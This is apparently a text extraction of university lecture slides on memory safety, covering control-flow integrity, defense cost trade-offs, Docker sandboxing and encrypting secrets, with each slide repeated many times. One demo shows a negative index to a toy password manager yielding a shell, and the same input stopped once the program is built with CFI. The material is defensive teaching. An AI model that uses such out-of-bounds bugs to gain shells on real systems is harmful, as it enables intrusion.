![Page 381: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/381.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 382: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/382.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 383: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/383.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 384: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/384.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 385: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/385.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 386: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/386.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 387: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/387.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 388: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/388.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 389: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/389.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 390: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/390.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 391: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/391.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 392: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/392.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 393: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/393.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 394: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/394.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 395: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/395.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 396: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/396.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 397: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/397.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 398: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/398.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \-fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type ’void ()’ failed during indirect function call
0x000000293028: note: (unknown) defined here
89 Michael Schwarz — www.iaik.tugraz.at
![Page 399: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/399.jpg)
Is that all we can do? www.tugraz.at
• We discussed techniques to prevent the Instantiation step
• Canary
• ASLR
• And control-flow integrity to prevent Programming step
• They provide good protection but can be circumvented
• Why use the countermeasures if they can be circumvented?
90 Michael Schwarz — www.iaik.tugraz.at
![Page 400: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/400.jpg)
Is that all we can do? www.tugraz.at
• We discussed techniques to prevent the Instantiation step
• Canary
• ASLR
• And control-flow integrity to prevent Programming step
• They provide good protection but can be circumvented
• Why use the countermeasures if they can be circumvented?
90 Michael Schwarz — www.iaik.tugraz.at
![Page 401: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/401.jpg)
Is that all we can do? www.tugraz.at
• We discussed techniques to prevent the Instantiation step
• Canary
• ASLR
• And control-flow integrity to prevent Programming step
• They provide good protection but can be circumvented
• Why use the countermeasures if they can be circumvented?
90 Michael Schwarz — www.iaik.tugraz.at
![Page 402: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/402.jpg)
Is that all we can do? www.tugraz.at
• We discussed techniques to prevent the Instantiation step
• Canary
• ASLR
• And control-flow integrity to prevent Programming step
• They provide good protection but can be circumvented
• Why use the countermeasures if they can be circumvented?
90 Michael Schwarz — www.iaik.tugraz.at
![Page 403: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/403.jpg)
Is that all we can do? www.tugraz.at
• We discussed techniques to prevent the Instantiation step
• Canary
• ASLR
• And control-flow integrity to prevent Programming step
• They provide good protection but can be circumvented
• Why use the countermeasures if they can be circumvented?
90 Michael Schwarz — www.iaik.tugraz.at
![Page 404: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/404.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 405: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/405.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 406: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/406.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 407: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/407.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 408: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/408.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 409: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/409.jpg)
Costs and Raising the Bar www.tugraz.at
• Often arguments such as
• “We have to increase the costs/raise the bar for an attacker”
• “Many layers of security make it a lot harder for an attacker”
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
Ñ slower programs, increased memory consumption, ...
91 Michael Schwarz — www.iaik.tugraz.at
![Page 410: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/410.jpg)
Costs and Raising the Bar www.tugraz.at
• User has to pay the costs all the time
• Attacker only has to pay them once
• A defender has to decide whether such a trade-off is worth for
individual cases
92 Michael Schwarz — www.iaik.tugraz.at
![Page 411: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/411.jpg)
Costs and Raising the Bar www.tugraz.at
• User has to pay the costs all the time
• Attacker only has to pay them once
• A defender has to decide whether such a trade-off is worth for
individual cases
92 Michael Schwarz — www.iaik.tugraz.at
![Page 412: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/412.jpg)
Costs and Raising the Bar www.tugraz.at
• User has to pay the costs all the time
• Attacker only has to pay them once
• A defender has to decide whether such a trade-off is worth for
individual cases
92 Michael Schwarz — www.iaik.tugraz.at
![Page 413: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/413.jpg)
Costs and Raising the Bar www.tugraz.at
• Presented countermeasures provide a good trade-off between
cost and security
• This is one reason why they are widely used
• Future hardware might implement some countermeasures to
reduce the costs
• What else can we do in the meantime?
93 Michael Schwarz — www.iaik.tugraz.at
![Page 414: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/414.jpg)
Costs and Raising the Bar www.tugraz.at
• Presented countermeasures provide a good trade-off between
cost and security
• This is one reason why they are widely used
• Future hardware might implement some countermeasures to
reduce the costs
• What else can we do in the meantime?
93 Michael Schwarz — www.iaik.tugraz.at
![Page 415: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/415.jpg)
Costs and Raising the Bar www.tugraz.at
• Presented countermeasures provide a good trade-off between
cost and security
• This is one reason why they are widely used
• Future hardware might implement some countermeasures to
reduce the costs
• What else can we do in the meantime?
93 Michael Schwarz — www.iaik.tugraz.at
![Page 416: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/416.jpg)
Costs and Raising the Bar www.tugraz.at
• Presented countermeasures provide a good trade-off between
cost and security
• This is one reason why they are widely used
• Future hardware might implement some countermeasures to
reduce the costs
• What else can we do in the meantime?
93 Michael Schwarz — www.iaik.tugraz.at
![Page 417: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/417.jpg)
Limit the damage www.tugraz.at
• Might not prevent attack from a sophisticated attacker
Ñ Restrict the attacker after the exploit
• Protect our system, even if application is controlled by the
attacker
94 Michael Schwarz — www.iaik.tugraz.at
![Page 418: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/418.jpg)
Limit the damage www.tugraz.at
• Might not prevent attack from a sophisticated attacker
Ñ Restrict the attacker after the exploit
• Protect our system, even if application is controlled by the
attacker
94 Michael Schwarz — www.iaik.tugraz.at
![Page 419: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/419.jpg)
Limit the damage www.tugraz.at
• Might not prevent attack from a sophisticated attacker
Ñ Restrict the attacker after the exploit
• Protect our system, even if application is controlled by the
attacker
94 Michael Schwarz — www.iaik.tugraz.at
![Page 420: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/420.jpg)
Sandboxing www.tugraz.at
95 Michael Schwarz — www.iaik.tugraz.at
![Page 421: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/421.jpg)
Sandboxing - Demo www.tugraz.at
• Simple sandboxing with Docker can be as easy as running one command% docker run --rm --read-only=true -i --cap-drop=all \
--net=none -v $PWD:/app -t ubuntu /app/pwdman
Enter PIN:
? ? ? ? ? ? ? ?
# ls
app bin boot dev etc home lib lib64 media mnt
opt proc root run sbin srv sys tmp usr var
# echo "test" > /tmp/test
sh: 4: cannot create /tmp/test: Read-only file system
# networkctl
IDX LINK TYPE OPERATIONAL SETUP
1 lo loopback n/a n/a
1 links listed.
96 Michael Schwarz — www.iaik.tugraz.at
![Page 422: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/422.jpg)
Sandboxing - Demo www.tugraz.at
• Simple sandboxing with Docker can be as easy as running one command% docker run --rm --read-only=true -i --cap-drop=all \
--net=none -v $PWD:/app -t ubuntu /app/pwdman
Enter PIN: ? ? ? ? ? ? ? ?
# ls
app bin boot dev etc home lib lib64 media mnt
opt proc root run sbin srv sys tmp usr var
# echo "test" > /tmp/test
sh: 4: cannot create /tmp/test: Read-only file system
# networkctl
IDX LINK TYPE OPERATIONAL SETUP
1 lo loopback n/a n/a
1 links listed.
96 Michael Schwarz — www.iaik.tugraz.at
![Page 423: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/423.jpg)
Sandboxing - Demo www.tugraz.at
• Simple sandboxing with Docker can be as easy as running one command% docker run --rm --read-only=true -i --cap-drop=all \
--net=none -v $PWD:/app -t ubuntu /app/pwdman
Enter PIN: ? ? ? ? ? ? ? ?
# ls
app bin boot dev etc home lib lib64 media mnt
opt proc root run sbin srv sys tmp usr var
# echo "test" > /tmp/test
sh: 4: cannot create /tmp/test: Read-only file system
# networkctl
IDX LINK TYPE OPERATIONAL SETUP
1 lo loopback n/a n/a
1 links listed.
96 Michael Schwarz — www.iaik.tugraz.at
![Page 424: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/424.jpg)
Sandboxing - Demo www.tugraz.at
• An attacker cannot do much anymore
• The file system is readonly, no files can be changed/created
• No files of the host computer are visible, except the program and
the password list
• There is no network connection to easily exfiltrate data
• Even if our program is owned by an attacker, the attacker can
at least not harm the rest of the system
97 Michael Schwarz — www.iaik.tugraz.at
![Page 425: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/425.jpg)
Sandboxing - Demo www.tugraz.at
• An attacker cannot do much anymore
• The file system is readonly, no files can be changed/created
• No files of the host computer are visible, except the program and
the password list
• There is no network connection to easily exfiltrate data
• Even if our program is owned by an attacker, the attacker can
at least not harm the rest of the system
97 Michael Schwarz — www.iaik.tugraz.at
![Page 426: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/426.jpg)
Sandboxing - Demo www.tugraz.at
• An attacker cannot do much anymore
• The file system is readonly, no files can be changed/created
• No files of the host computer are visible, except the program and
the password list
• There is no network connection to easily exfiltrate data
• Even if our program is owned by an attacker, the attacker can
at least not harm the rest of the system
97 Michael Schwarz — www.iaik.tugraz.at
![Page 427: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/427.jpg)
Expect the worst www.tugraz.at
• Always expect the worst case that could happen!
• In this case: attacker found exploitable bug, circumvented all
countermeasures, got a shell in the sandbox and was able to
read the password file
• Ñ No problem if file is encrypted, and key is derived from PIN
• (Assuming the crypto is good, and you used it correctly)
98 Michael Schwarz — www.iaik.tugraz.at
![Page 428: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/428.jpg)
Expect the worst www.tugraz.at
• Always expect the worst case that could happen!
• In this case: attacker found exploitable bug, circumvented all
countermeasures, got a shell in the sandbox and was able to
read the password file
• Ñ No problem if file is encrypted, and key is derived from PIN
• (Assuming the crypto is good, and you used it correctly)
98 Michael Schwarz — www.iaik.tugraz.at
![Page 429: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/429.jpg)
Expect the worst www.tugraz.at
• Always expect the worst case that could happen!
• In this case: attacker found exploitable bug, circumvented all
countermeasures, got a shell in the sandbox and was able to
read the password file
• Ñ No problem if file is encrypted, and key is derived from PIN
• (Assuming the crypto is good, and you used it correctly)
98 Michael Schwarz — www.iaik.tugraz.at
